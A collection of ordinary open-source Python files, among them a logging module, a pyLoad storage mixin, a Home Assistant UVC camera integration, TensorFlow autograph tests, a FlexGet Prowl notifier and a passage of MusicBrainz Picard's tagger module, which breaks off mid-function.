_loggers = []
"""
The list of registered logging functions.
"""
def register_logger(logger):
"""
Register a logger. Each call to one of the logging functions
defined by this module will be delegated to each registered
logger.
"""
_loggers.append(logger)
def remove_logger(logger):
_loggers.remove(logger)
######################################################################
# Logging Functions
######################################################################
# The following methods all just delegate to the corresponding
# methods in the Logger class (above) for each registered logger.
def _broadcast(level, messages):
    # Render each fragment with '%s', join with spaces, and deliver the
    # resulting message to every registered logger.
    message = ' '.join(['%s' % (m,) for m in messages])
    for logger in _loggers:
        logger.log(level, message)


def fatal(*messages):
    """Display the given fatal message."""
    _broadcast(FATAL, messages)


def error(*messages):
    """Display the given error message."""
    _broadcast(ERROR, messages)


def warning(*messages):
    """Display the given warning message."""
    _broadcast(WARNING, messages)


def docstring_warning(*messages):
    """Display the given docstring warning message."""
    _broadcast(DOCSTRING_WARNING, messages)


def info(*messages):
    """Display the given informational message."""
    _broadcast(INFO, messages)


def debug(*messages):
    """Display the given debugging message."""
    _broadcast(DEBUG, messages)
# Each function below simply forwards to the corresponding Logger method
# on every registered logger, and borrows that method's docstring.

def start_block(header):
    for logger in _loggers:
        logger.start_block(header)
start_block.__doc__ = Logger.start_block.__doc__


def end_block():
    for logger in _loggers:
        logger.end_block()
end_block.__doc__ = Logger.end_block.__doc__


def start_progress(header=None):
    for logger in _loggers:
        logger.start_progress(header)
start_progress.__doc__ = Logger.start_progress.__doc__


def end_progress():
    for logger in _loggers:
        logger.end_progress()
end_progress.__doc__ = Logger.end_progress.__doc__


def progress(percent, message=''):
    # Coerce the message to a string once before fanning out.
    text = '%s' % message
    for logger in _loggers:
        logger.progress(percent, text)
progress.__doc__ = Logger.progress.__doc__


def close():
    for logger in _loggers:
        logger.close()
|
smishenk/blink-crosswalk | refs/heads/master | Tools/Scripts/webkitpy/tool/steps/abstractstep.py | 50 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
from webkitpy.common.system.executive import ScriptError
from webkitpy.tool.steps.options import Options
class AbstractStep(object):
def __init__(self, tool, options):
self._tool = tool
self._options = options
def _exit(self, code):
sys.exit(code)
@classmethod
def options(cls):
return [
# We need this option here because cached_lookup uses it. :(
Options.git_commit,
]
def run(self, state):
raise NotImplementedError, "subclasses must implement"
|
chaosblog/pyload | refs/heads/stable | module/database/StorageDatabase.py | 41 | # -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: mkaay
"""
from module.database import style
from module.database import DatabaseBackend
class StorageMethods():
    """Key/value storage helpers that are mixed into the database backend.

    Every value is scoped by an identifier (typically a plugin name), so
    different plugins may reuse the same keys without collisions.
    """

    @style.queue
    def setStorage(db, identifier, key, value):
        # Emulate an upsert: update the row when it already exists,
        # insert a new one otherwise.
        db.c.execute("SELECT id FROM storage WHERE identifier=? AND key=?", (identifier, key))
        exists = db.c.fetchone() is not None
        if exists:
            db.c.execute("UPDATE storage SET value=? WHERE identifier=? AND key=?", (value, identifier, key))
        else:
            db.c.execute("INSERT INTO storage (identifier, key, value) VALUES (?, ?, ?)", (identifier, key, value))

    @style.queue
    def getStorage(db, identifier, key=None):
        if key is not None:
            # Single-key lookup: return the value, or None when missing.
            db.c.execute("SELECT value FROM storage WHERE identifier=? AND key=?", (identifier, key))
            row = db.c.fetchone()
            if row is not None:
                return row[0]
        else:
            # No key: return every key/value pair for this identifier.
            db.c.execute("SELECT key, value FROM storage WHERE identifier=?", (identifier, ))
            return dict((row[0], row[1]) for row in db.c)

    @style.queue
    def delStorage(db, identifier, key):
        db.c.execute("DELETE FROM storage WHERE identifier=? AND key=?", (identifier, key))


DatabaseBackend.registerSub(StorageMethods)
|
jnewland/home-assistant | refs/heads/ci | homeassistant/components/uvc/camera.py | 7 | """Support for Ubiquiti's UVC cameras."""
import logging
import socket
import requests
import voluptuous as vol
from homeassistant.const import CONF_PORT, CONF_SSL
from homeassistant.components.camera import Camera, PLATFORM_SCHEMA
import homeassistant.helpers.config_validation as cv
from homeassistant.exceptions import PlatformNotReady
_LOGGER = logging.getLogger(__name__)

# Configuration keys for connecting to the Unifi NVR.
CONF_NVR = 'nvr'
CONF_KEY = 'key'
CONF_PASSWORD = 'password'

# Defaults: 'ubnt' is presumably the factory camera password (confirm
# against Ubiquiti docs); 7080 is the NVR HTTP port; SSL off by default.
DEFAULT_PASSWORD = 'ubnt'
DEFAULT_PORT = 7080
DEFAULT_SSL = False

# Extend the shared camera platform schema with NVR-specific options.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
    vol.Required(CONF_NVR): cv.string,
    vol.Required(CONF_KEY): cv.string,
    vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
    vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
    vol.Optional(CONF_SSL, default=DEFAULT_SSL): cv.boolean,
})
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Discover cameras on a Unifi NVR.

    Returns False on an authorization failure (not retried) and raises
    PlatformNotReady on connection/NVR errors so setup is retried later.
    """
    addr = config[CONF_NVR]
    key = config[CONF_KEY]
    password = config[CONF_PASSWORD]
    port = config[CONF_PORT]
    ssl = config[CONF_SSL]

    from uvcclient import nvr
    try:
        # Exceptions may be raised in all method calls to the nvr library.
        nvrconn = nvr.UVCRemote(addr, port, key, ssl=ssl)
        cameras = nvrconn.index()

        # NVR 3.2.0 and newer identify cameras by 'id'; older versions
        # use 'uuid'.
        identifier = 'id' if nvrconn.server_version >= (3, 2, 0) else 'uuid'
        # Filter out airCam models, which are not supported in the latest
        # version of UnifiVideo and which are EOL by Ubiquiti
        cameras = [
            camera for camera in cameras
            if 'airCam' not in nvrconn.get_camera(camera[identifier])['model']]
    except nvr.NotAuthorized:
        _LOGGER.error("Authorization failure while connecting to NVR")
        return False
    except nvr.NvrError as ex:
        _LOGGER.error("NVR refuses to talk to me: %s", str(ex))
        raise PlatformNotReady
    except requests.exceptions.ConnectionError as ex:
        _LOGGER.error("Unable to connect to NVR: %s", str(ex))
        raise PlatformNotReady

    add_entities([UnifiVideoCamera(nvrconn,
                                   camera[identifier],
                                   camera['name'],
                                   password)
                  for camera in cameras])
    return True
class UnifiVideoCamera(Camera):
    """A Ubiquiti Unifi Video Camera."""

    def __init__(self, nvr, uuid, name, password):
        """Initialize an Unifi camera."""
        super(UnifiVideoCamera, self).__init__()
        self._nvr = nvr
        self._uuid = uuid
        self._name = name
        self._password = password
        self.is_streaming = False
        # Caches the address that last accepted a login so later logins
        # skip probing every candidate address.
        self._connect_addr = None
        self._camera = None
        self._motion_status = False

    @property
    def name(self):
        """Return the name of this camera."""
        return self._name

    @property
    def is_recording(self):
        """Return true if the camera is recording."""
        caminfo = self._nvr.get_camera(self._uuid)
        return caminfo['recordingSettings']['fullTimeRecordEnabled']

    @property
    def motion_detection_enabled(self):
        """Camera Motion Detection Status."""
        caminfo = self._nvr.get_camera(self._uuid)
        return caminfo['recordingSettings']['motionRecordEnabled']

    @property
    def brand(self):
        """Return the brand of this camera."""
        return 'Ubiquiti'

    @property
    def model(self):
        """Return the model of this camera."""
        caminfo = self._nvr.get_camera(self._uuid)
        return caminfo['model']

    def _login(self):
        """Login to the camera.

        Tries the cached address first, otherwise each address the NVR
        reports.  Returns True on success and None on failure.
        """
        from uvcclient import camera as uvc_camera

        caminfo = self._nvr.get_camera(self._uuid)
        if self._connect_addr:
            addrs = [self._connect_addr]
        else:
            addrs = [caminfo['host'], caminfo['internalHost']]

        # NVR 3.2.0 and newer use a different camera client API.
        if self._nvr.server_version >= (3, 2, 0):
            client_cls = uvc_camera.UVCCameraClientV320
        else:
            client_cls = uvc_camera.UVCCameraClient

        if caminfo['username'] is None:
            caminfo['username'] = 'ubnt'

        camera = None
        for addr in addrs:
            try:
                camera = client_cls(
                    addr, caminfo['username'], self._password)
                camera.login()
                _LOGGER.debug("Logged into UVC camera %(name)s via %(addr)s",
                              dict(name=self._name, addr=addr))
                self._connect_addr = addr
                break
            except socket.error:
                # Unreachable address; try the next candidate.
                pass
            except uvc_camera.CameraConnectError:
                pass
            except uvc_camera.CameraAuthError:
                pass
        if not self._connect_addr:
            _LOGGER.error("Unable to login to camera")
            return None

        self._camera = camera
        return True

    def camera_image(self):
        """Return the image of this camera."""
        from uvcclient import camera as uvc_camera

        if not self._camera:
            if not self._login():
                return

        def _get_image(retry=True):
            try:
                return self._camera.get_snapshot()
            except uvc_camera.CameraConnectError:
                _LOGGER.error("Unable to contact camera")
            except uvc_camera.CameraAuthError:
                # The session may have expired: log in again and retry
                # exactly once before giving up.
                if retry:
                    self._login()
                    return _get_image(retry=False)
                _LOGGER.error(
                    "Unable to log into camera, unable to get snapshot")
                raise

        return _get_image()

    def set_motion_detection(self, mode):
        """Set motion detection on or off."""
        from uvcclient.nvr import NvrError

        if mode is True:
            set_mode = 'motion'
        else:
            set_mode = 'none'

        try:
            self._nvr.set_recordmode(self._uuid, set_mode)
            self._motion_status = mode
        except NvrError as err:
            # Best-effort: log the failure and leave the cached status alone.
            _LOGGER.error("Unable to set recordmode to %s", set_mode)
            _LOGGER.debug(err)

    def enable_motion_detection(self):
        """Enable motion detection in camera."""
        self.set_motion_detection(True)

    def disable_motion_detection(self):
        """Disable motion detection in camera."""
        self.set_motion_detection(False)
|
Ibtiss4m/sendprismApp | refs/heads/master | sendprism/contrib/sites/__init__.py | 1349 | # -*- coding: utf-8 -*- |
sdn-ixp/iSDX | refs/heads/master | visualization/dockers/redis-service/pub-sub/sub.py | 3 | from settings import r
import sys
if __name__ == '__main__':
channel = sys.argv[1]
pubsub = r.pubsub()
pubsub.subscribe(channel)
print 'Listening to {channel}'.format(**locals())
while True:
for item in pubsub.listen():
print item['data']
|
allenlavoie/tensorflow | refs/heads/master | tensorflow/contrib/autograph/converters/call_trees_test.py | 1 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for call_trees module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.autograph.converters import call_trees
from tensorflow.contrib.autograph.converters import converter_test_base
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class CallTreesTest(converter_test_base.TestCase):
    """Unit tests for the call_trees autograph converter."""

    def test_basic(self):
        # The converter rewrites the call site; the renamed callee is
        # injected manually below since only test_fn_2 is transformed.

        def test_fn_1(_):
            raise ValueError('This should not be called in the compiled verison.')

        def renamed_test_fn_1(a):
            return a + 1

        def test_fn_2(a):
            return test_fn_1(a) + 1

        node = self.parse_and_analyze(test_fn_2, {'test_fn_1': test_fn_1})
        node = call_trees.transform(node, self.ctx, (), ())

        with self.compiled(node) as result:
            # Only test_fn_2 is transformed, so we'll insert renamed_test_fn_1
            # manually.
            result.renamed_test_fn_1 = renamed_test_fn_1
            self.assertEquals(3, result.test_fn_2(1))

    def test_dynamic_function(self):
        # Calls through a function-valued argument are wrapped so that the
        # runtime mock supplies the actual value.

        def test_fn_1():
            raise ValueError('This should be masked by the mock.')

        def test_fn_2(f):
            return f() + 3

        node = self.parse_and_analyze(test_fn_2, {})
        node = call_trees.transform(node, self.ctx, (), ())

        with self.compiled(node) as result:
            # 10 = 7 (from the mock) + 3 (from test_fn_2)
            self.assertEquals(10, result.test_fn_2(test_fn_1))

    def test_simple_methods(self):
        # Method calls through self should survive conversion unchanged
        # when the namer performs no renaming.

        class TestClass(object):

            def test_fn_1(self, a):
                return a + 1

            def test_fn_2(self, a):
                return self.test_fn_1(a) + 1

        node = self.parse_and_analyze(
            TestClass.test_fn_2, {'TestClass': TestClass},
            namer=converter_test_base.FakeNoRenameNamer(),
            arg_types={'self': (TestClass.__name__, TestClass)})
        node = call_trees.transform(node, self.ctx, (), ())

        with self.compiled(node) as result:
            tc = TestClass()
            self.assertEquals(3, result.test_fn_2(tc, 1))

    def test_py_func_wrap_no_retval(self):
        # A call with no return value should become a py_func op whose
        # side effect only happens at graph execution time.

        def test_fn(a):
            setattr(a, 'foo', 'bar')

        node = self.parse_and_analyze(test_fn, {'setattr': setattr})
        node = call_trees.transform(node, self.ctx, (), ())

        with self.compiled(node) as result:
            with self.test_session() as sess:
                # The function has no return value, so we do some tricks to grab the
                # generated py_func node and ensure its effect only happens at graph
                # execution.

                class Dummy(object):
                    pass

                a = Dummy()
                result.test_fn(a)
                self.assertFalse(hasattr(a, 'foo'))
                sess.run(sess.graph.get_operations()[0])
                self.assertEquals('bar', a.foo)

    def test_py_func_wrap_known_function(self):
        # Known non-TF functions (here np.random.binomial) are wrapped in
        # py_func and produce a Tensor of the declared dtype.

        def test_fn():
            return np.random.binomial(2, 0.5)

        node = self.parse_and_analyze(test_fn, {'np': np})
        node = call_trees.transform(node, self.ctx, (), ())

        with self.compiled(node, dtypes.int64) as result:
            result.np = np
            with self.test_session() as sess:
                self.assertTrue(isinstance(result.test_fn(), ops.Tensor))
                self.assertIn(sess.run(result.test_fn()), (0, 1, 2))

    def test_uncompiled_modules(self):
        # Calls into whitelisted (uncompiled) modules must be left alone.

        def test_fn(a):
            a = math_ops.multiply(a, constant_op.constant(2))
            a = math_ops.add(a, constant_op.constant(1))
            return a

        node = self.parse_and_analyze(test_fn, {
            'math_ops': math_ops,
            'constant_op': constant_op
        })
        node = call_trees.transform(node, self.ctx,
                                    set(((math_ops.__name__,),
                                         (constant_op.__name__,))), ())

        with self.compiled(node) as result:
            result.math_ops = math_ops
            result.constant_op = constant_op
            with self.test_session() as sess:
                # Not renamed, because the converter doesn't rename the definition
                # itself (the caller is responsible for that).
                result_tensor = result.test_fn(constant_op.constant(1))
                self.assertEquals(3, sess.run(result_tensor))
# Standard TensorFlow test entry point.
if __name__ == '__main__':
    test.main()
|
JorisDeRieck/Flexget | refs/heads/develop | flexget/components/notify/notifiers/prowl.py | 4 | from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import logging
import xml.etree.ElementTree as ET
from flexget import plugin
from flexget.config_schema import one_or_more
from flexget.event import event
from flexget.plugin import PluginWarning
from flexget.utils.requests import Session as RequestSession, TimedLimiter
from requests.exceptions import RequestException
plugin_name = 'prowl'
log = logging.getLogger(plugin_name)

# Prowl public API endpoint used to push a notification.
PROWL_URL = 'https://api.prowlapp.com/publicapi/add'

# Retry transient failures and rate-limit calls to the Prowl service.
requests = RequestSession(max_retries=3)
requests.add_domain_limiter(TimedLimiter('prowlapp.com', '5 seconds'))
class ProwlNotifier(object):
    """
    Send prowl notifications

    Example::

      notify:
        entries:
          via:
            - prowl:
                api_key: xxxxxxx
                [application: application name, default FlexGet]
                [event: event title, default New Release]
                [priority: -2 - 2 (2 = highest), default 0]
                [description: notification to send]
    """

    schema = {
        'type': 'object',
        'properties': {
            'api_key': one_or_more({'type': 'string'}),
            'application': {'type': 'string', 'default': 'FlexGet'},
            'priority': {'type': 'integer', 'minimum': -2, 'maximum': 2},
            'url': {'type': 'string'},
            'provider_key': {'type': 'string'},
        },
        'required': ['api_key'],
        'additionalProperties': False,
    }

    def notify(self, title, message, config):
        """
        Send a Prowl notification

        :param title: notification title (Prowl 'event')
        :param message: notification body (Prowl 'description')
        :param config: validated plugin configuration (see `schema`)
        :raises PluginWarning: when the HTTP request fails or Prowl
            returns an error element in its response.
        """
        notification = {
            'application': config.get('application'),
            'event': title,
            'description': message,
            'url': config.get('url'),
            'priority': config.get('priority'),
            'providerkey': config.get('provider_key'),
        }

        # The Prowl API accepts multiple API keys as one comma-separated
        # string.  The previous code wrapped an existing list in another
        # list, which produced a malformed 'apikey' parameter whenever
        # more than one key was configured.
        if isinstance(config['api_key'], list):
            config['api_key'] = ','.join(config['api_key'])

        notification['apikey'] = config['api_key']
        try:
            response = requests.post(PROWL_URL, data=notification)
        except RequestException as e:
            raise PluginWarning(repr(e))

        # Prowl answers with a small XML document containing either an
        # <error> or a <success> element.
        request_status = ET.fromstring(response.content)
        error = request_status.find('error')
        if error is not None:
            raise PluginWarning(error.text)
        else:
            success = request_status.find('success').attrib
            log.debug(
                'prowl notification sent. Notifications remaining until next reset: %s. '
                'Next reset will occur in %s minutes',
                success['remaining'],
                success['resetdate'],
            )
@event('plugin.register')
def register_plugin():
    # Expose this notifier to FlexGet under the 'notifiers' interface.
    plugin.register(ProwlNotifier, plugin_name, api_ver=2, interfaces=['notifiers'])
|
Freso/picard | refs/heads/master | picard/tagger.py | 2 | # -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
# Copyright (C) 2004 Robert Kaye
# Copyright (C) 2006 Lukáš Lalinský
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from __future__ import print_function
import sip
sip.setapi("QString", 2)
sip.setapi("QVariant", 2)
from PyQt4 import QtGui, QtCore
import argparse
import os.path
import platform
import re
import shutil
import signal
import sys
from functools import partial
from itertools import chain
# A "fix" for http://python.org/sf/1438480
def _patched_shutil_copystat(src, dst):
try:
_orig_shutil_copystat(src, dst)
except OSError:
pass
_orig_shutil_copystat = shutil.copystat
shutil.copystat = _patched_shutil_copystat
import picard.resources
import picard.plugins
from picard.i18n import setup_gettext
from picard import (PICARD_APP_NAME, PICARD_ORG_NAME,
PICARD_FANCY_VERSION_STR, __version__,
log, acoustid, config)
from picard.album import Album, NatAlbum
from picard.browser.browser import BrowserIntegration
from picard.browser.filelookup import FileLookup
from picard.cluster import Cluster, ClusterList, UnmatchedFiles
from picard.const import USER_DIR, USER_PLUGIN_DIR
from picard.dataobj import DataObject
from picard.disc import Disc
from picard.file import File
from picard.formats import open as open_file
from picard.track import Track, NonAlbumTrack
from picard.releasegroup import ReleaseGroup
from picard.collection import load_user_collections
from picard.ui.mainwindow import MainWindow
from picard.ui.itemviews import BaseTreeView
from picard.plugin import PluginManager
from picard.acoustidmanager import AcoustIDManager
from picard.config_upgrade import upgrade_config
from picard.util import (
decode_filename,
encode_filename,
thread,
mbid_validate,
check_io_encoding,
uniqify,
is_hidden,
versions,
)
from picard.webservice import XmlWebService
from picard.ui.searchdialog import (
TrackSearchDialog,
AlbumSearchDialog,
ArtistSearchDialog
)
class Tagger(QtGui.QApplication):
tagger_stats_changed = QtCore.pyqtSignal()
listen_port_changed = QtCore.pyqtSignal(int)
cluster_added = QtCore.pyqtSignal(Cluster)
cluster_removed = QtCore.pyqtSignal(Cluster)
album_added = QtCore.pyqtSignal(Album)
album_removed = QtCore.pyqtSignal(Album)
__instance = None
def __init__(self, picard_args, unparsed_args, localedir, autoupdate):
# Set the WM_CLASS to 'MusicBrainz-Picard' so desktop environments
# can use it to look up the app
QtGui.QApplication.__init__(self, ['MusicBrainz-Picard'] + unparsed_args)
self.__class__.__instance = self
config._setup(self)
self._cmdline_files = picard_args.FILE
self._autoupdate = autoupdate
self._debug = False
# FIXME: Figure out what's wrong with QThreadPool.globalInstance().
# It's a valid reference, but its start() method doesn't work.
self.thread_pool = QtCore.QThreadPool(self)
# Use a separate thread pool for file saving, with a thread count of 1,
# to avoid race conditions in File._save_and_rename.
self.save_thread_pool = QtCore.QThreadPool(self)
self.save_thread_pool.setMaxThreadCount(1)
if not sys.platform == "win32":
# Set up signal handling
# It's not possible to call all available functions from signal
# handlers, therefore we need to set up a QSocketNotifier to listen
# on a socket. Sending data through a socket can be done in a
# signal handler, so we use the socket to notify the application of
# the signal.
# This code is adopted from
# https://qt-project.org/doc/qt-4.8/unix-signals.html
# To not make the socket module a requirement for the Windows
# installer, import it here and not globally
import socket
self.signalfd = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM, 0)
self.signalnotifier = QtCore.QSocketNotifier(self.signalfd[1].fileno(),
QtCore.QSocketNotifier.Read, self)
self.signalnotifier.activated.connect(self.sighandler)
signal.signal(signal.SIGHUP, self.signal)
signal.signal(signal.SIGINT, self.signal)
signal.signal(signal.SIGTERM, self.signal)
# Setup logging
self.debug(picard_args.debug or "PICARD_DEBUG" in os.environ)
log.debug("Starting Picard from %r", os.path.abspath(__file__))
log.debug("Platform: %s %s %s", platform.platform(),
platform.python_implementation(), platform.python_version())
log.debug("Versions: %s", versions.as_string())
log.debug("Configuration file path: %r", config.config.fileName())
# TODO remove this before the final release
if sys.platform == "win32":
olduserdir = "~\\Local Settings\\Application Data\\MusicBrainz Picard"
else:
olduserdir = "~/.picard"
olduserdir = os.path.expanduser(olduserdir)
if os.path.isdir(olduserdir):
log.info("Moving %r to %r", olduserdir, USER_DIR)
try:
shutil.move(olduserdir, USER_DIR)
except:
pass
log.debug("User directory: %r", os.path.abspath(USER_DIR))
# for compatibility with pre-1.3 plugins
QtCore.QObject.tagger = self
QtCore.QObject.config = config
QtCore.QObject.log = log
check_io_encoding()
# Must be before config upgrade because upgrade dialogs need to be
# translated
setup_gettext(localedir, config.setting["ui_language"], log.debug)
upgrade_config()
self.xmlws = XmlWebService()
load_user_collections()
# Initialize fingerprinting
self._acoustid = acoustid.AcoustIDClient()
self._acoustid.init()
# Load plugins
self.pluginmanager = PluginManager()
if hasattr(sys, "frozen"):
self.pluginmanager.load_plugindir(os.path.join(os.path.dirname(sys.argv[0]), "plugins"))
else:
mydir = os.path.dirname(os.path.abspath(__file__))
self.pluginmanager.load_plugindir(os.path.join(mydir, "plugins"))
self.pluginmanager.load_plugindir(os.path.join(mydir, os.pardir, "contrib", "plugins"))
if not os.path.exists(USER_PLUGIN_DIR):
os.makedirs(USER_PLUGIN_DIR)
self.pluginmanager.load_plugindir(USER_PLUGIN_DIR)
self.pluginmanager.query_available_plugins()
self.acoustidmanager = AcoustIDManager()
self.browser_integration = BrowserIntegration()
self.files = {}
self.clusters = ClusterList()
self.albums = {}
self.release_groups = {}
self.mbid_redirects = {}
self.unmatched_files = UnmatchedFiles()
self.nats = None
self.window = MainWindow()
self.exit_cleanup = []
self.stopping = False
def register_cleanup(self, func):
    """Register a callable to be invoked during application shutdown."""
    self.exit_cleanup.append(func)
def run_cleanup(self):
    """Invoke every cleanup callback added via register_cleanup(), in order."""
    for callback in self.exit_cleanup:
        callback()
def debug(self, debug):
    """Toggle debug-level logging; no-op when the flag is unchanged."""
    if self._debug == debug:
        return
    if debug:
        log.log_levels = log.log_levels | log.LOG_DEBUG
        log.debug("Debug mode on")
    else:
        # Log the message first, while the debug level is still enabled.
        log.debug("Debug mode off")
        log.log_levels = log.log_levels & ~log.LOG_DEBUG
    self._debug = debug
def move_files_to_album(self, files, albumid=None, album=None):
    """Move `files` to tracks on album `albumid`.

    When `album` is given it is used directly; otherwise the album is
    loaded (or fetched from the cache) via `albumid`.
    """
    if album is None:
        album = self.load_album(albumid)
    if album.loaded:
        album.match_files(files)
    else:
        # Album still loading: park the files on its unmatched list.
        # Iterates a copy -- presumably file.move() can mutate the source
        # collection; TODO confirm.
        for file in list(files):
            file.move(album.unmatched_files)
def move_file_to_album(self, file, albumid):
    """Move `file` to a track on album `albumid`."""
    # Convenience wrapper around move_files_to_album().
    self.move_files_to_album([file], albumid)
def move_file_to_track(self, file, albumid, recordingid):
    """Move `file` to recording `recordingid` on album `albumid`."""
    album = self.load_album(albumid)
    # Park on the album's unmatched list until the album data arrives,
    # then match to the specific recording.
    file.move(album.unmatched_files)
    album.run_when_loaded(partial(album.match_file, file, recordingid))
def create_nats(self):
    """Return the non-album-tracks (NAT) album, creating it on first use."""
    if self.nats is None:
        self.nats = NatAlbum()
        self.albums["NATS"] = self.nats
        self.album_added.emit(self.nats)
    return self.nats
def move_file_to_nat(self, file, recordingid, node=None):
    """Move `file` onto the non-album track for `recordingid`."""
    self.create_nats()
    file.move(self.nats.unmatched_files)
    nat = self.load_nat(recordingid, node=node)
    nat.run_when_loaded(partial(file.move, nat))
    if nat.loaded:
        self.nats.update()
def exit(self):
    """Shut down all subsystems, run cleanup callbacks and flush Qt events."""
    log.debug("Picard stopping")
    self.stopping = True
    self._acoustid.done()
    self.thread_pool.waitForDone()
    self.save_thread_pool.waitForDone()
    self.browser_integration.stop()
    self.xmlws.stop()
    # Reuse run_cleanup() instead of duplicating its callback loop here.
    self.run_cleanup()
    QtCore.QCoreApplication.processEvents()
def _run_init(self):
    """One-shot startup hook: add files/directories given on the command line."""
    if self._cmdline_files:
        files = []
        for file in self._cmdline_files:
            if os.path.isdir(file):
                self.add_directory(decode_filename(file))
            else:
                files.append(decode_filename(file))
        if files:
            self.add_files(files)
        # Processed exactly once; drop the attribute afterwards.
        del self._cmdline_files
def run(self):
    """Show the main window, run the Qt event loop; return the exit code."""
    if config.setting["browser_integration"]:
        self.browser_integration.start()
    self.window.show()
    # Defer command-line file loading until the event loop is running.
    QtCore.QTimer.singleShot(0, self._run_init)
    res = self.exec_()
    self.exit()
    return res
def event(self, event):
    """Qt event hook: run proxied main-thread calls and handle FileOpen events."""
    if isinstance(event, thread.ProxyToMainEvent):
        event.run()
    elif event.type() == QtCore.QEvent.FileOpen:
        f = str(event.file())
        self.add_files([f])
        # We should just return True here, except that seems to
        # cause the event's sender to get a -9874 error, so
        # apparently there's some magic inside QFileOpenEvent...
        return 1
    return QtGui.QApplication.event(self, event)
def _file_loaded(self, file, target=None):
    """Callback after a file finished loading: route it to its destination.

    Priority: explicit drop `target`, then embedded MusicBrainz IDs
    (unless configured to ignore them), then optional fingerprinting.
    """
    if file is not None and not file.has_error():
        recordingid = file.metadata.getall('musicbrainz_recordingid')[0] \
            if 'musicbrainz_recordingid' in file.metadata else ''
        if target is not None:
            self.move_files([file], target)
        elif not config.setting["ignore_file_mbids"]:
            albumid = file.metadata.getall('musicbrainz_albumid')[0] \
                if 'musicbrainz_albumid' in file.metadata else ''
            if mbid_validate(albumid):
                if mbid_validate(recordingid):
                    self.move_file_to_track(file, albumid, recordingid)
                else:
                    self.move_file_to_album(file, albumid)
            elif mbid_validate(recordingid):
                self.move_file_to_nat(file, recordingid)
            elif config.setting['analyze_new_files'] and file.can_analyze():
                self.analyze([file])
        # Same fallback when file MBIDs are configured to be ignored.
        elif config.setting['analyze_new_files'] and file.can_analyze():
            self.analyze([file])
def move_files(self, files, target):
    """Move `files` onto `target`, dispatching on the target's type."""
    if isinstance(target, (Track, Cluster)):
        for file in files:
            file.move(target)
    elif isinstance(target, File):
        # Dropping onto a file moves next to it, i.e. onto its parent.
        for file in files:
            file.move(target.parent)
    elif isinstance(target, Album):
        self.move_files_to_album(files, album=target)
    elif isinstance(target, ClusterList):
        self.cluster(files)
def add_files(self, filenames, target=None):
    """Add files to the tagger.

    Filenames are normalized, filtered against the configured ignore
    regex and (optionally) a hidden-file check, opened, and scheduled
    for asynchronous loading.  `target` selects where loaded files are
    moved; None (or the unmatched-files cluster) means "unmatched".
    """
    ignoreregex = None
    pattern = config.setting['ignore_regex']
    if pattern:
        ignoreregex = re.compile(pattern)
    ignore_hidden = config.setting["ignore_hidden_files"]
    new_files = []
    for filename in filenames:
        filename = os.path.normpath(os.path.realpath(filename))
        if ignore_hidden and is_hidden(filename):
            # Lazy log arguments, consistent with the other log calls here.
            log.debug("File ignored (hidden): %r", filename)
            continue
        if ignoreregex is not None and ignoreregex.search(filename):
            log.info("File ignored (matching %r): %r", pattern, filename)
            continue
